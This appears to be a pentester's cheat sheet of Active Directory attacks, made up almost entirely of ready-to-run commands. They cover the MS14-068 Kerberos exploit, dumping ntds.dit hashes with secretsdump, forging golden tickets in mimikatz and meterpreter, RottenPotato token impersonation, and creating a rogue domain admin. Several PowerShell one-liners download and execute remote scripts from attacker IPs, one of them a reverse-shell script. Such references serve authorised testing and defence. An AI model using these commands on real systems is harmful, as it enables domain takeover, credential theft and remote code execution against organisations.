# Active Directory Attacks ## Most common paths to AD compromise * MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) ```bash Exploit Python: https://www.exploit-db.com/exploits/35474/ Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum git clone https://github.com/bidord/pykek python ./ms14-068.py -u @ -s -d -p python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" ``` * MS17-010 (Eternal Blue - Local Admin) ```c nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 ``` * Unconstrained Delegation (incl. pass-the-ticket) * OverPass-the-Hash (Making the most of NTLM password hashes) * GPO - Pivoting with Local Admin & Passwords in SYSVOL ```c findstr /S /I cpassword \\\sysvol\\policies\*.xml or Metasploit: scanner/smb/smb_enumshares Metasploit: windows/gather/enumshares Metasploit: windows/gather/credentials/gpp /!\ GPO Priorization : Organization Unit > Domain > Site > Local List all GPO for a domain : Get-GPO -domaine DOMAIN.COM -all Get-GPOReport -all -reporttype xml --all ``` * Dangerous Built-in Groups Usage * Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit) ```c C:\>ntdsutil ntdsutil: activate instance ntds ntdsutil: ifm ifm: create full c:\pentest ifm: quit ntdsutil: quit or vssadmin create shadow /for=C : Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit then you need to use secretsdump to extract the hashes secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL or Metasploit : windows/gather/credentials/domain_hashdump or PowerSploit : Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit ``` * Golden Tickets Mimikatz version ```c Get info - Mimikatz lsadump::dcsync /user:krbtgt lsadump::lsa /inject /name:krbtgt Forge a Golden ticket - Mimikatz kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt kerberos::tgt ``` Meterpreter version ```c Get info - Meterpreter(kiwi) dcsync_ntlm krbtgt dcsync krbtgt Forge a Golden ticket - Meterpreter load kiwi golden_ticket_create -d -k -s -u -t golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck kerberos_ticket_purge kerberos_ticket_use /root/Downloads/pentestlabuser.tck kerberos_ticket_list ``` * Kerberoast ```c https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/ https://room362.com/post/2016/kerberoast-pt1/ ``` * Silver Tickets * Trust Tickets ## Tools * [Impacket](https://github.com/CoreSecurity/impacket) * Responder * Mimikatz * [Ranger](https://github.com/funkandwagnalls/ranger) * BloodHound * RottenPotato * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) ## PowerSploit ``` https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks” powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" ``` ## PrivEsc - Token Impersonation (RottenPotato) Binary available at : https://github.com/foxglovesec/RottenPotato Binary available at : https://github.com/breenmachine/RottenPotatoNG ```c getuid getprivs use incognito list\_tokens -u cd c:\temp\ execute -Hc -f ./rot.exe impersonate\_token "NT AUTHORITY\SYSTEM" ``` ``` Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" ``` ## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) ``` Powershell: https://www.exploit-db.com/exploits/39719/ https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 Binary exe : https://github.com/Meatballs1/ms16-032 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc ``` ## Local Admin to Domain Admin ``` net user hacker2 hacker123 /add /Domain net group "Domain Admins" hacker2 /add /domain ``` ## Thanks to * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html) * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) * [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1) * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) * [Golden ticket](https://pentestlab.blog/2018/04/09/golden-ticket/)